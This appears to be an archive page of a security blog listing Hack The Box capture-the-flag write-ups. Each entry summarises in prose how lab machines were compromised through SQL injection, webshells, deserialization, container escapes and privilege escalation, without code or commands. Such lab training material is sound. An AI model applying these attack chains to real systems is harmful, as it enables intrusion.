HTB: Validationctf htb-validation hackthebox uhc nmap cookies feroxbuster burp burp-repeater sqli injection second-order-sqli python python-cmd sqli-file webshell password-reuse credentials
Validation is another box HTB made for the UHC competition. It is a qualifier box, meant to be easy and help select the top ten to compete later this month. Once it was done on UHC, HTB makes it available. In this box, I’ll exploit a second-order SQL injection, write a script to automate the enumeration, and identify the SQL user has FILE permissions. I’ll use that to write a webshell, and get execution. For root, it’s simple password reuse from the database. In Beyond Root, I’ll look at how this box started and ended in a container.
HTB: Schooledctf htb-schooled hackthebox nmap moodle feroxbuster wfuzz vhosts cve-2020-25627 cve-2020-14321 moodle-plugin webshell password-reuse credentials hashcat pkg freebsd package htb-teacher
Schooled starts with a string of exploits to gain more and more privilege in a Moodle instance, eventually leading to a malicious plugin upload that provides a webshell. I’ll pull some hashes from the DB and crack them to get to the next user. This user can run the FreeBSD package manager, pkg, as root, and can also write to the hosts file. I’ll trick it into connecting to my VM, and give it a malicious package that provide root. In Beyond Root, I’ll look at the Moodle plugin a bit more in depth.
HTB: Unobtainiumhackthebox ctf htb-unobtainium nmap kubernetes deb package electron nodejs lfi prototype-pollution command-injection injection asar sans-holiday-hack htb-onetwoseven source-code kubectl
Unobtainium was the first box on HackTheBox to play with Kubernetes, a technology for deploying and managing containers. It also has a Electron application to reverse, which allows for multiple exploits against the server, first local file include, then prototype pollution, and finally command injection. With a shell, I’ll find a way to gain admin access over Kubernetes and get root with a malicious container.
HTB: Goboxhackthebox htb-gobox ctf uhc nmap ubuntu go ssti feroxbuster youtube python python-cmd aws awscli docker s3 webshell upload nginx-module backdoor nginxexecute
HackTheBox made Gobox to be used in the Hacking Esports UHC competition on Aug 29, 2021. Once the competition is over, HTB put it out for all of us to play. This is neat box, created by IppSec, where I’ll exploit a server-side template injection vulnerability in a Golang webserver to leak creds to the site, and then the full source. I’ll use the source with the SSTI to get execution, but no shell. I’ll write a script to make enumeration easy, and then identify the host is in AWS, and is managing a bucket the hosts another site. I’ll upload a PHP webshell to get a shell on the main host. Finally, I’ll find a backdoor NGINX module which is enabled, reverse it to get execution, and get a shell as root.
HTB: Knifectf hackthebox htb-knife nmap php-backdoor feroxbuster php-8.1.0-dev sudo knife gtfobins vim oscp-like
Knife is one of the easier boxes on HTB, but it’s also one that has gotten significantly easier since it’s release. I’ll start with a webserver that isn’t hosting much of a site, but is leaking that it’s running a dev version of PHP. This version happens to be the version that had a backdoor inserted into it when the PHP development servers were hacked in March 2021. At the time of release, just searching for this version string didn’t immediately lead to the backdoor, but within two days of release it did. For root, the user can run knife as root. At the time of release, there was no GTFObins page for knife, so the challenge required reading the docs to find a way to run arbitrary code. That page now exists.
Pivoting off Phishing Domainforensics threat-intel phishing riskiq maltego youtube
John Hammond YouTube channel is full of neat stuff, from CTF solutions to real malware analysis. Recently, he did an analysis of an email with an HTML attachment which presented as a fake Microsoft login page. When a victim enters creds, the page would send them to[.]us, and redirect the user to an actual Microsoft Outlook site. John looked at bit at the registration information on the domain, but I wanted to dive a bit deeper, specifically using RiskIQ and Maltego.
HTB: Properctf htb-proper hackthebox nmap windows iis gobuster ajax sqlmap sqli keyed-hash sqli-orderby sqlmap-eval hashcat lfi rfi time-of-check-time-of-use inotifywait go ida ghidra arbitrary-write reverse-engineering arbitrary-read wertrigger pipe-monitor powershell named-pipe cve-2021-1732 htb-hackback htb-scriptkiddie
Proper was a fascinating Windows box with three fascinating stages. First, there’s a SQL injection, but the url parameters are hashed with a key, so I need to leak that key, and then make sure to update the hash for each request. I get to play with the eval option for SQLmap, as well as show some manual scripting to do it. Next, there’s a time of check / time of use vulnerability in a file include that allows me to do a remote file include over SMB, swapping out the contents between the first and second read to get code execution. For root, there’s a Go binary that does cleanup of files in the users Downloads folder that I can abuse to get arbitrary write as SYSTEM. I’ll abuse this with the windows error reporting system to get execution. In Beyond Root, I’ll look at a couple more ways to get root using this binary.
HTB: CrossFitTwohackthebox ctf htb-crossfittwo nmap openbsd feroxbuster burp websocket sqli injection vhosts unbound python python-cmd flask sqlmap relayd api wfuzz cors phishing socket-io javascript nodejs node-modules yubikey changelist ykgenerate
Much like CrossFit, CrossFitTwo was just a monster of a box. The centerpiece is a crazy cross-site scripting attack through a password reset interface using DNS to redirect the admin to a site I control to then have them register an account for me. I’ll then hijack some socket.io messages to get access to chats where I’ll capture a password to get a shell. On the box, I’ll abuse NodeJS’s module load order, then extract the root ssh key from a changelist backup and the yubikey seed needed to get SSH as root.
HTB: Lovehackthebox ctf htb-love nmap vhosts voting-system searchsploit feroxbuster ssrf burp webshell upload winpeas alwaysinstallelevated msi htb-ethereal msfvenom oscp-like
Love was a solid easy-difficulty Windows box, with three stages. First, I’ll use a simple SSRF to get access to a webpage that is only allowed to be viewed from localhost that leaks credentials for a Voting System instance. Then, I’ll exploit an upload vulnerability in Voting System to get RCE, showing both using the searchsploit script and manual exploitation. Finally, I’ll abuse the AlwaysInstallElevated setting to get a system shell.
HTB: TheNotebookctf htb-thenotebook hackthebox nmap feroxbuster jwt jwt-io upload webshell cve-2019-5736 runc docker go
TheNotebook starts off with a website where I’ll abuse a JWT misconfiguration to convince the server to validate my token using a key hosted on my server. From there, I’ll get access to a site where I can upload a PHP webshell and get execution. After finding an SSH key in a backup, I’ll exploit a vulnerability in runc, the executable that underlies Docker to get execution as the root user in the host.
HTB: Armageddonhackthebox htb-armageddon ctf nmap ubuntu drupal drupalgeddon2 searchsploit webshell upload hashcat mysql sudo snap snapcraft burp oscp-like
Argageddon was a box targeted at beginners. The foothold exploit, Drupalgeddon2 has many public exploit scripts that can be used to upload a webshell and run commands. I’ll get access to the database and get the admin’s hash, crack it, and find that password is reused on the host as well. To get root, I’ll abuse the admin’s ability to install snap packages as root.
HTB: Breadcrumbsctf htb-breadcrumbs hackthebox nmap gobuster burp python cookies jwt upload webshell defender password-reuse tunnel stickynotes sqlite ghidra chisel sqli injection cyberchef aes crypto htb-buff oscp-plus
Breadcrumbs starts with a fair amount of web enumeration and working to get little bits of additional access. First I’ll leak the page source with a directory traversal vulnerability, and use that to get the algorithms necessary to forge both a session cookie and a JWT token. With both of those cookies, I gain administrator access to the site, and can upload a webshell after bypassing some filtering and Windows Defender. I’ll find the next user’s data in the website files. I’ll find another password in Sticky Notes data, and use that to get access to a new password manager under development. To get to administrator, I’ll exploit a SQL injection in the password manager to get the encrypted password and the key material to decrypt it, providing the admin password.
HTB: Atomctf htb-atom hackthebox nmap xampp redis reverse-engineering portable-kanban smbmap smbclient crackmapexec feroxbuster asar nodejs electron wireshark msfvenom cyberchef printnightmare invoke-nightmare cve-2021-34527 htb-sharp oscp-plus
Atom was a box that involved insecure permissions on an update server, which allowed me to write a malicious payload to that server and get execution when an Electron App tried to update from my host. I’ll reverse the electron app to understand the tech, and exploit it to get a shell. For root, I’ll have to exploit a Portable-Kanban instance which is using Redis to find a password. In Beyond Root, a quick visit back to PrintNightmare.
Playing with PrintNightmarehackthebox htb-heist cve-2021-1675 cve-2021-34527 printnightmare evil-winrm invoke-nightmare sharpprintnightmare dll samba visual-studio htb-hackback.
HTB: Ophiuchihtb-ophiuchi hackthebox ctf nmap ubuntu yaml tomcat java jar deserialization gobuster marshalsec yaml-payload wasm wasm-fiddle htb-ropetwo oscp-like
Ophiuchi presented two interesting attacks. First there was a Java YAML deserialization attack that involved generating a JAR payload to inject via a serialized payload. Then there was a somewhat contrived challenge that forced me to generate web assembly (or WASM) code to get execution of a Bash script.
HTB: Spectrahackthebox ctf htb-spectra nmap chromeos nano wordpress wpscan wordpress-plugin credentials password-reuse autologon-credentials initctl sudo
Spectra was the first ChromeOS box on HackTheBox. I’ll start looking at a web server and find a password as well as a WordPress site. The password gets me into the admin panel, where I can edit a plugin or write a new plugin to get execution. From there I’ll find auto-login credentials and use them to get a shell as the next user. That user can control the init daemon with sudo, which I’ll abuse to get root.
HTB: Tentaclehackthebox htb-tentacle ctf nmap dig dns dnsenum vhosts kerbrute kerberos ntpdate squid as-rep-roast john proxychains nmap-over-proxy wpad opensmtpd exploitdb cve-2020-7247 msmtprc credentials password-reuse kinit keytab klist htb-unbalanced htb-joker getfacl facl
Tentacle was a box of two halves. The start is all about a squid proxy, and bouncing through two one them (one of them twice) to access an internal network, where I’ll find a wpad config file that alerts me to another internal network. In that second network, I’ll exploit an OpenSMTPd server and get a foothold. The second half was about abusing Kerberos in a Linux environment. I’ll use creds to get SSH authenticated by Kerberos, then abuse a backup script that give that principle access as another user. That user can access the KeyTab file, which allows them to administer the domain, and provides root access. In Beyond Root, a dive too deep into the rabbit hole of understanding the KeyTab file.
HTB: Enterprisehtb-enterprise hackthebox ctf nmap docker ubuntu debian wordpress joomla wpscan feroxbuster wordpress-plugin sqli sqlmap error-based-sqli password-reuse webshell xinetd bof ret2libc ltrace ghidra pattern checksec gdb peda pwntools python htb-frolic
To own Enterprise, I’ll have to work through different containers to eventually reach the host system. The WordPress instance has a plugin with available source and a SQL injection vulnerability. I’ll use that to leak creds from a draft post, and get access to the WordPress instance. I can use that to get RCE on that container, but there isn’t much else there. I can also use those passwords to access the admin panel of the Joomla container, where I can then get RCE and a shell. I’ll find a directory mounted into that container that allows me to write a webshell on the host, and get RCE and a shell there. To privesc, I’ll exploit a service with a simple buffer overflow using return to libc. In Beyond Root, I’ll dig more into the Double Query Error-based SQLI.
HTB: Tenetctf hackthebox htb-tenet nmap gobuster vhosts wordpress wpscan php deserialization webshell password-reuse credentials race-condition bash
Tenet provided a very straight-forward deserialization attack to get a foothold and a race-condition attack to get root. Both are the kinds of attacks seem more commonly on hard- and insane-rated boxes, but at a medium difficult here.
HTB: Nodehtb-node hackthebox ctf nmap express nodejs feroxbuster crackstation john source-code password-reuse bof ret2libc mongo ltrace ghidra pattern-create checksec aslr aslr-brute-force exploit command-injection filter wildcard
Node is about enumerating a Express NodeJS application to find an API endpoint that shares too much data., including user password hashes. To root the box, there’s a simple return to libc buffer overflow exploit. I had some fun finding three other ways to get the root flag, as well as one that didn’t work out.
HTB: ScriptKiddiectf htb-scriptkiddie hackthebox nmap searchsploit msfvenom cve-2020-7384 msfconsole command-injection injection incron irb oscp-like
ScriptKiddie was the third box I wrote that has gone live on the HackTheBox platform. From the time I first heard about the command injection vulnerability in msfvenom, I wanted to make a box themed around a novice hacker and try to incorporate it. To own this box, I’ll find the website which has a few tools for a hacker might use, including an option to have msfvenon create a payload. I’ll upload a malicious template and get code execution on the box. From there, I’ll exploit a cron with another command injection to reach the next user. Finally, to root, I’ll abuse the sudo rights of that user to run msfconsole as root, and use the built in shell commands to get a root shell. In Beyond Root, a look at some of the automations I put in place for the box.
Cereal Unintended Rootctf hackthebox htb-cereal dotnet iis timing-attack
There’s a really neat unintended path to root on Cereal discovered by HackTheBox user FF5. The important detail to notice is that a shell as sonny running via a webshell has additional groups related to IIS that don’t show up in an SSH shell. I can use these groups to exploit the IIS service and how it manages the website running as root with a timing attack that will allow me to slip my own code into the site and execute it. I’ll find the directory where IIS stages files and compiles them, the Shadow Copy Folders. I’ll delete everything in there, and trigger IIS to rebuilt. It will copy the source into the directory and compile it, but there’s a chance for me to modify the source between the copy and the compile.
HTB: Cerealctf hackthebox htb-cereal nmap iis windows vhosts wfuzz feroxbuster react dotnet csharp git gitdumper source-code jwt python javascript visualstudio ssrf xss deserialization json-deserialization npm npm-audit react-marked-markdown webshell aspx roguepotato potato sweetpotato printspoofer graphql graphql-voyager graphql-playground jq ssrf genericpotato htb-hackback
Cereal was all about takign attacks I’ve done before, and breaking the ways I’ve previously done them so that I had to dig deeper and really understand them. I’ll find the source for a website on an exposed Git repo. The site is built in C#/.NET on the backend, and React JavaScript on the client side. I’ll first have to find the code that generates authentication tokens and use that to forge a token that gets me past the login. There I have access to a form that can submit cereal flavor requests. I’ll chain together a cross-site scripting vulnerability and a deserialization vulnerability to upload a webshell. That was made more tricky because the serverside code had logic in place to break payloads generated by YSoSerial. With execution, I’ll find the first user password and get SSH access. That user has SeImpersonate. But with no print spooler service on the box, and no outbound TCP port 135, neither RoguePotato, SweetPotato, or PrintSpoofer could abuse it to get a SYSTEM shell. I’ll enumerate a site running on localhost and its GraphQL backend to find a serverside request forgery vulnerability, which I’ll abuse with GenericPotato to get a shell as System.
HTB: Shockerhtb-shocker hackthebox ctf nmap feroxbuster cgi shellshock bashbug burp cve-2014-6271 gtfobin
The name Shocker gives away pretty quickly what I’ll need to do on this box. There were a couple things to look out for along the way. First, I’ll need to be careful when directory brute forcing, as the server is misconfigured in that the cgi-bin directory doesn’t show up without a trailing slash. This means that tools like gobuster and feroxbuster miss it in their default state. I’ll show both manually exploiting ShellShock and using the nmap script to identify it is vulnerable. Root is a simple GTFObin in perl. In Beyond Root, I’ll look at the Apache config and go down a rabbit hole looking at what commands cause execution to stop in ShellShock and try to show how I experimented to come up with a theory that seems to explain what’s happening.
HTB: Deliveryctf hackthebox htb-delivery nmap vhosts osticket mattermost password-reuse mysql hashcat hashcat-rules oscp-like
Delivery is a easy-rated box that I found very beginner friendly. It didn’t require anything technically complex, but rather a bit of creative thinking. The box presents a helpdesk and an instance of Mattermost. By creating a ticket at the helpdesk, I get an email that I can use to update the ticket. I’ll use that email to register a Mattermost account, where I find internal conversations that include creds for SSH. With access to the box, I’ll check out the database and dump the root password hash. Using hashcat rules mentioned in the Mattermost chat, I’ll crack that password, which is the root password on the box.
HTB: Kotarakhtb-kotarak ctf hackthebox nmap tomcat feroxbuster ssrf msfvenom war container lxc ntds secretsdump wget cve-2016-4971 authbind disk lvm htb-nineveh htb-jerry htb-tabby
Kotarak was an old box that I had a really fun time replaying for a writeup. It starts with an SSRF that allows me to find additional webservers on ports only listening on localhost. I’ll use that to leak a Tomcat config with username and password, and upload a malicious war to get a shell. From there, I can access files from an old Windows pentest to include an ntds.dit file and a system hive. That’s enough to dump a bunch of hashes, one of which cracks and provides creds I can use to get the next user. The root flag is actually in a container that is using Wget to request a file every two minutes. It’s an old vulnerable version, and a really neat exploit that involves sending a redirect to an FTP server and using that to write a malicious config file in the root home directory in the container. I’ll also show an alternative root abusing the user’s disk group to exfil the entire root filesystem and grab the flag on my local system.
Digging into cgroups Escapectf hackthebox htb-ready docker container cgroups escape overlayfs release-agent
The method I used in Ready to get code execution on the host system from a docker container running as privileged was a series of bash commands that didn’t make any sense on first glance. I wanted to dive into them and see what was happening under the hood.
HTB: Readyctf htb-ready hackthebox nmap ubuntu gitlab cve-2018-19571 ssrf cve-2018-19585 crlf-injection burp redis docker container escape docker-privileged cgroups oscp-like
Ready was another opportunity to abuse CVEs in GitLab to get a foothold in a GitLab container. Within that container, I’ll find some creds that will escalate to root. I’ll also notice that the container is run with the privileged flag, which gives it a lot of power with respect to the host system. I’ll show two ways to abuse this, using cgroups and just accessing the host filesystem.
HTB: Bluehtb-blue hackthebox ctf nmap nmap-scripts smbmap smbclient metasploit ms17-010 eternalblue meterpreter impacket virtualenv
Blue was the first box I owned on HTB, on 8 November 2017. And it really is one of the easiest boxes on the platform. The root first blood went in two minutes. You just point the exploit for MS17-010 (aka ETERNALBLUE) at the machine and get a shell as System. I’ll show how to find the machine is vulnerable to MS17-010 using Nmap, and how to exploit it with both Metasploit and using Python scripts.
HTB: Attendedhackthebox htb-attended ctf nmap smtp stmp-user-enum swaks phishing vim cve-2019-12735 vim-modelines firewall scripting python ssh-config ssh-keys ping-sweep nc-port-scan openbsd reverse-engineering ida gdb debug ssh-keygen bof rop pattern-create ropper command-injection htb-flujab htb-ypuffy htb-travel
Attended was really hard. At the time of writing three days before it retires, just over 100 people have rooted it, making it the least rooted box on HackTheBox. It starts with a phishing exercise where hints betray that the user will open a text file in Vim, opening them to the Vim modelines exploit to get command execution. But there’s a firewall blocking any outbound traffic that isn’t ICMP or a valid HTTP GET request, so I’ll write some scripts to build command and control through that. Then I find a place I can drop an SSH config file that will be run by the second user, which I’ll abuse to get SSH access. For root, there’s a buffer overflow in a command processing SSH auth on the gateway. I’ll craft a malicious SSH key to overflow that binary and get a reverse shell. In Beyond Root, I’ll look at an unintended command injection in the SSH config running script.
Networking VMs for HTBctf hackthebox configuration virtual-machine parrot-os
When doing HTB or other CTFs, I typically run from a Linux VM (formerly Kali, lately Parrot), but I also need to use a Windows VM from time to time as well. Some of those times, I’ll need to interact with the HTB machines over the VPN from the Windows host, and it’s always a bit of a pain to turn off the VPN in the Linux VM, and then turn it on from Windows. This post shows how I configured my VMs so that Windows traffic can route through the Linux VM to HTB.
More Bucket Beyond Rootctf htb-bucket hackthebox s3 aws awscli apache docker localstack cron automation
@teh_zeron reach out on twitter to ask why there’s no images directory in the webroot on Bucket. I showed how my PHP webshell will show up there, and the index page seems to always be there. I’ll look closely at how Bucket was set up, how different requests are handled, and the automation that is syncing between the host and the container.
HTB: Sharphackthebox htb-sharp ctf nmap portable-kanban reverse-engineering dnspy crypto crackmapexec dotnet-remoting ysoserial.net deserialization exploitremotingservice wcf visual-studio csharp htb-json
Sharp was all about C# and .NET. It started with a PortableKanban config. At the time of release, there was no public scripts decrypting the database, so it involved reverse engineering a real .NET binary. From there, I’ll reverse and exploit a .NET remoting service with a serialized payload to get shell as user. To escalate to system, I’ll reverse a Windows Communication Foundation (WCF)-based service to find an endpoint that runs PowerShell code. I’ll create a client to return a reverse shell. I’m also going to solve this one from a Windows VM (mostly).
HTB: Toolboxhackthebox htb-toolbox ctf nmap windows wfuzz docker-toolbox sqli injection postgres sqlmap default-creds docker container
Toolbox is a machine that released directly into retired as a part of the Containers and Pivoting Track on HackTheBox. It’s a Windows instance running an older tech stack, Docker Toolbox. Before Windows could support containers, this used VirtualBox to run a lightweight custom Linux OS optimized for running Docker. I’ll get a foodhold using SQL injection which converts into RCE with sqlmap. Then I’ll use default credentials to pivot into the VM, where I find an SSH key that gives administrator access to the host system.
HTB: Bucketctf htb-bucket hackthebox s3 aws awscli nmap vhosts wfuzz upload webshell php credentials password-reuse dynamodb tunnel localstack pd4ml pdfdetach getfacl facl
Bucket is a pentest against an Amazon AWS stack. There’s an S3 bucket that is being used to host a website and is configured to allow unauthenticated read / write. I’ll upload a webshell to get a foothold on the box. From there, I’ll access the DynamoDB instance to find some passwords, one of which is re-used for the user on the box. There’s another webserver on localhost with a in-development service that creates a PDF based on entries in the database. I’ll exploit that to get file read on the system as root, and turn that into a root shell. In Beyond Root, I’ll look at some of the configuration that allowed the box to simulate AWS inside HTB.
HTB: Laboratoryhackthebox htb-laboratory ctf gitlab nmap vhosts gobuster searchsploit cve-2020-10977 deserialization hackerone docker ruby irb suid path-hijack
As the name hints at, Laboratory is largely about exploiting a GitLab instance. I’ll exploit a CVE to get arbitrary read and then code execution in the GitLab container. From there, I’ll use that access to get access to the admin’s private repo, which happens to have an SSH key. To escalate to root, I’ll exploit a SUID binary that is calling
system("chmod ...")in an unsafe way, dropping my own binary and modifying the PATH so that mine gets run as root.
HTB: APThackthebox htb-apt ctf nmap ipv6 rpc ioxidresolver active-directory domain-controller crackmapexec hashcat secretsdump ntds kerbrute wail2ban pykerbrute mimikatz passthehash powershell remote-registry powerview reg-py evil-winrm history lmcompatibilitylevel net-ntlmv1 winpeas seatbelt amsi defender responder roguepotato ntlmrelayx visual-studio crack-sh powershell-history oscp-plus
APT was a clinic in finding little things to exploit in a Windows host. I’ll start with access to only RPC and HTTP, and the website has nothing interesting. I’ll use RPC to identify an IPv6 address, which when scanned, shows typical Windows DC ports. Over SMB, I’ll pull a zip containing files related to an Active Directory environment. After cracking the password, I’ll use these files to dump 2000 users / hashes. Kerbrute will identify one user that is common between the backup and the AD on APT. The hash for that user doesn’t work, and brute forcing using NTLM hashes gets me blocked using SMB, so I’ll modify pyKerbrute to test all the hashes from the backup with the user, finding one that works. With that hash, I can access the registry and find additional creds that provide WinRM access. With a shell, I’ll notice that the system still allows Net-NTLMv1, which is an insecure format. I’ll show two ways to get the Net-NTLMv1 challenge response, first an unintended path using Defender and Responder, and then the intended path using RoguePotato and a custom RPC server created by modifying NTLMRelayX.
HTB: Timectf htb-time hackthebox nmap cve-2019-12384 java deserialization json-deserialization sql linpeas systemd short-lived-shells oscp-like
Time is a straight forward box with two steps and low enumeration. The first step involves looking at the error code coming off a web application and some Googling to find an associated CVE. From there, I’ll build a serialized JSON payload using the template in some of the CVE writeups, and get code execution and a shell. There’s a Systemd timer running every few seconds, and the script being run is world writable. To get root, I’ll just add some commands to that script and let it run. In Beyond Root, I look at the webserver and if I could write a file in the webroot, and also at handling the initial short-lived shell I got from the Systemd timer.
HTB: Luannehtb-luanne ctf hackthebox nmap netbsd supervisor-process-manager default-creds http-basic-auth burp feroxbuster api lua command-injection htpasswd hashcat doas pgp netpgp source-code oscp-like
Luanne was the first NetBSD box I’ve done on HTB. I’ll gain access to an instance of Supervisor Process Manager, and use that to leak a process list, which shows where to look on the port 80 webserver. I’ll find an API that I know is backed by a Lua script, and exploit a command injection vulnerability to get execution and a shell. I’ll get credentials for a webserver listening on localhost and find an SSH key hosted there to get to the second user. That user can doas (like sudo on BSD) arbitrary commands as root, the password is needed. It’s in an encrypted backup file which can be decrypted using PGP on the host. In Beyond Root, I’ll look at the Lua script, figure out how it works, where the injection vulnerability is, and compare that to the patched dev version to see how it was fixed.
HTB: CrossFithtb-crossfit hackthebox ctf nmap ftp-tls openssl wfuzz vhosts gobuster xss javascript xmlhttprequest cors csrf laravel lftp webshell ansible credentials hashcat php-shellcommand vsftpd pam hidepid pspy reverse-engineering ghidra arbitrary-write
CrossFit is all about chaining attacks together to get the target to do my bidding. It starts with a cross-site scripting (XSS) attack against a website. The site detects the attack, and forwards my user agent to the admins to investigation. An XSS payload in the user-agent will trigger, giving some access there. I’ll abuse cross-origin resource sharing (CORS) to identify another subdomain, and then use the XSS to do a cross-site request forgery, having the admins create an account for me on that subdomain, which provides FTP access, where I can upload a webshell, and use the XSS once again to trigger it for a reverse shell. I’ll dig a hash out of ansible configs and crack it to get the next user. To escalate again, I’ll exploit a command injection vulnerability in a PHP plugin, php-shellcommand, by writing to the database. To get root, I’ll reverse engineer a binary that runs on a cron and figure out how to trick it to write a SSH key into root’s authorized_keys file.
HTB: Optimumhackthebox htb-optimum ctf nmap windows httpfileserver hfs searchsploit cve-2014-6287 nishang winpeas watson sherlock process-architechure ms16-032 cve-2016-0099 htb-bounty
Optimum was sixth box on HTB, a Windows host with two CVEs to exploit. The first is a remote code execution vulnerability in the HttpFileServer software. I’ll use that to get a shell. For privesc, I’ll look at unpatched kernel vulnerabilities. Today to enumerate these I’d use Watson (which is also built into winPEAS), but getting the new version to work on this old box is actually challenging, so I’ll use Sherlock (a predecessor to Watson) to identify these vulnerabilities. I got hung up for a bit not realizing my shell was running in a 32-bit process, causing my kernel exploits to fail. I’ll show some analysis of that as well.
Reel2: Root Shellhackthebox ctf htb-reel2 htb-reel nmap wallstant apache xampp mysql webshell chisel
Both YB1 and JKR suggested a neat method for getting a shell on Reel2 that involves abusing the Apache Web server running as SYSTEM to write a webshell. It’s a neat path that involves identifying where the config files are and getting access to the database using the arbitrary read intended to get the root flag.
HTB: Reel2hackthebox htb-reel2 ctf windows nmap gobuster owa wallstant javascript sprayingtoolkit phishing responder hashcat ps-remoting jea jea-escape stickynotes
Much like it’s predascor, Reel, Reel2 was focused on realistic attacks against a Windows environment. This time I’ll collect names from a social media site and use them to password spray using the SprayingToolkit. Once I find a working password, I’ll send a link from that account and get an NTLM hash using responder. From there I need to break out of a JEA limited PowerShell, find creds to another account, and trick a custom command from that account into reading root.txt.
HTB: Sensehtb-sense hackthebox ctf oscp-like pfsense nmap gobuster dirbuster searchsploit metasploit command-injection feroxbuster cve-2016-10709 burp
Sense is a box my notes show I solved almost exactly three years ago. It’s a short box, using directory brute forcing to find a text file with user credentials, and using those to gain access to a PF Sense Firewall. From there I’ll exploit a code injection using Metasploit to get code execution and a shell as root. In Beyond Root, I’ll look at a couple things that I would do differently today. First, I’ll show out Feroxbuster to do the recurrsive directory brute force, and then I’ll dig into the exploit and how it works and how it might be done without Metasploit.
HTB: Passagehtb-passage ctf hackthebox nmap cutenews webshell upload searchsploit github source-code base64 penglab hashcat vim usbcreator arbitrary-write arbitrary-read cyberchef oscp-like passwd
In Passage, I’ll find and exploit CuteNews with a webshell upload. I’ll have to analyze the CuteNews source to figure out how it stores user data in files to find the hash for the next user, which I’ll crack. That user shares an SSH key with the next user on the box. To root, I’ll exploit a bug in USBCreator that allows me to run sudo without knowing the user’s password. In Beyond Root, I’ll dive into the basics of base64 and how to search for strings in large amounts of base64 data.
HTB: Sneakyhackthebox htb-sneaky ctf nmap udp snmp mibs gobuster sqli injection auth-bypass onesixtyone snmpwalk ipv6 suid bof pwn reverse-engineering ghidra gdb shellcode
Sneaky presented a website that after some basic SQL injection, leaked an SSH key. But SSH wasn’t listening. At least not on IPv4. I’ll show three ways to find the IPv6 address of Sneaky, and then SSH using that address to get user. For root, there’s a simple buffer overflow with no protections. I’ll show a basic attack, writing shellcode onto the stack and then returning into it.
HTB: Academyhackthebox ctf htb-academy nmap ubuntu php laravel vhosts gobuster cve-2018-15133 deserialization metasploit password-reuse credentials adm logs aureport composer gtfobins
HackTheBox releases a new training product, Academy, in the most HackTheBox way possible - By putting out a vulnerable version of it to hack on. There’s a website with a vulnerable registration page that allows me to register as admin and get access to a status dashboard. There I find a new virtual host, which is crashing, revealing a Laravel crash with data including the APP_KEY. I can use that to create a serialized payload to submit as an HTTP header or cookie to get execution. From there, I’ll reuse database creds to get to the next user, and then find more creds in auth logs, and finally get root with sudo composer.
HTB: Beepctf htb-beep hackthebox nmap elastix pbx dirsearch searchsploit lfi webmin smtp svwar sslscan shellshock webshell upload credentials password-reuse oscp-like htb-unattended
Even when it was released there were many ways to own Beep. I’ll show five, all of which were possible when this box was released in 2017. Looking a the timestamps on my notes, I completed Beep in August 2018, so this writeup will be a mix of those plus new explorations. The box is centered around PBX software. I’ll exploit an LFI, RCE, two different privescs, webmin, credential reuse, ShellShock, and webshell upload over SMTP.
HTB: Felinehackthebox htb-feline ctf nmap ubuntu upload tomcat deserialization java cve-2020-9484 ysoserial docker saltstack cve-2020-11651 chisel docker-sock container socat htb-fatty htb-arkham
Feline was another Tomcat box, this time exploiting a neat CVE that allowed me to upload a malcious serialized payload and then trigger it by giving a cookie that points the session to that file. The rest of the box focuses on Salt Stack, an IT automation platform. My foothold shell is on the main host, but Salt is running in a container. I’ll exploit another CVE to get a shell in the Salt container, and then exploit that containers access to the docker socket to get root on the host. In Beyond Root, I’ll show an alternative way of interacting with the docker socket by uploading the docker binary, and I’ll look at the permissions on that socket and how it’s shared into the container.
HTB: Charonhtb-charon ctf hackthebox nmap gobuster sqli injection command-injection filter bash waf crackstation upload webshell burp burp-repeater crypto rsa rsactftool history suid ltrace ghidra
Another 2017 box, but this one was a lot of fun. There’s an SQL injection the designed to break sqlmap (I didn’t bother to go into sqlmap, but once I finished saw from others). Then there’s a file upload, some crypto, and a command injection. I went into good detail on the manual SQLI and the RSA crypto. In Beyond Root, I’ll look at a second SQLI that didn’t prove usefu, and at the filters I had to bypass on the useful SQLI.
HTB: Jewelctf htb-jewel hackthebox nmap gitweb git ruby rails gemfile cve-2020-8164 irb deserialization google-authenticator totp postgres penglab hashcat oathtool gem
Jewel was all about Ruby, with a splash of Google Authenticator 2FA in the middle. I’ll start with an instance of GitWeb providing the source for a website. That source allows me to identify a Ruby on Rails deserialization exploit that provides code execution. To escalate, I’ll find the user’s password in the database, and the seed for the Google Authenticator to calculate the time-based one time password, both of which are needed to run sudo. From there, I can use GTFObins to get execution from the gem program.
HTB: Apocalysthackthebox htb-apocalyst ctf nmap wordpress wpscan gobuster wfuzz steghide passwd
Apocalyst wasn’t my favorite box. It is all about building a wordlist to find a specific image file on the site, and then extracting another list from that image using StegHide. That list contains the WordPress user’s password, giving access to the admin panel and thus execution. To root, I’ll find a writable passwd file and add in a root user.
HTB: Doctorhackthebox ctf htb-doctor nmap splunk vhosts flask payloadsallthethings ssti command-injection injection adm linpeas splunk-whisperer2 oscp-like htb-secnotes
Doctor was about attacking a message board-like website. I’ll find two vulnerabilities in the site, Server-Side Template injection and command injection. Either way, the shell I get back has access to read logs, where I’ll find a password sent to a password reset url, which works for both the next user and to log into the Splunk Atom Feed. I’ll exploit that with SplunkWhisperer2 to get RCE and a root shell. In Beyond Root, I’ll look at a strange artifact I found on the box where, and examine the source for both web exploit.
HTB: Europahtb-europa ctf hackthebox vhosts wfuzz sqli injection sqlmap preg_replace cron
Europa was a relatively easy box by today’s HTB standards, but it offers a good chance to play with the most basic of SQL injections, the auth bypass. I’ll also use sqlmap to dump the database. The foothold involves exploiting the PHP preg_replace function, which is something you’ll only see on older hosts at this point. To get root, I’ll find a cron job that calls another script that I can write.
HTB: Workerhtb-worker hackthebox ctf svn credentials password-reuse vhosts wfuzz azure azure-devops burp devops pipeline git webshell upload aspx evil-winrm azure-pipelines potato roguepotato juicypotato chisel socat tunnel oscp-like cicd htb-sizzle htb-json
Worker is all about exploiting an Azure DevOps environment. I’ll find creds in an old SVN repository and use them to get into the Azure DevOps control panel where several websites are managed. I’ll upload a webshell into one of the sites and rebuild it, gaining execution and a shell. With the shell I’ll find creds for another user, and use that to get back into Azure DevOps, this time as someone with permission to create pipelines, which I’ll use to get a shell as System. In Beyond Root, I’ll show RoguePotato, as this was one of the first vulnerable boxes to release after that came out.
HTB: Compromisedhackthebox ctf htb-compromised ubuntu litecart searchsploit gobuster mysql credentials php mysql-udf upload webshell disable-functions phpinfo strace pam-backdoor ldpreload-backdoor ghidra ghidra-version-tracking reverse-engineering ldpreload htb-stratosphere
